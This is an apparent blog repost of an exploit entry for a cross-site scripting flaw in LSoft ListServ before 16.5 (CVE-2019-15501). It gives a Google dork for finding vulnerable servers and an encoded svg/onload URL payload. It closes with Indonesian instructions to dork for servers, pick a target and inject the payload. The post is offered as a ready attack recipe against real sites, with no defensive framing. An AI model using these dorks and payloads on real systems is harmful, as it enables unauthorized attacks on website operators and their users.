LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)

Rianda ID
Maret 01, 2020
# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
# Google Dork: intitle:LISTSERV 16.5
# Date: 08-21-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: http://www.lsoft.com/
# Softwae Link: http://www.lsoft.com/products/listserv.asp
# Version: Older than Ver 16.5-2018a
# Tested on: IIS 8.5/10.0 - Firefox/Windows
# CVE : CVE-2019-15501

# Payload

1. http://target.com/scripts/wa.exe?OK=<PAYLOAD>
2. http://target.com/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'Anjay_by_Z3X')>


1. Dorking dahulu
2. Pilih target lalu masukkan payloadnya, jangan dikasih spasi ntar gabakal bisa
3. Done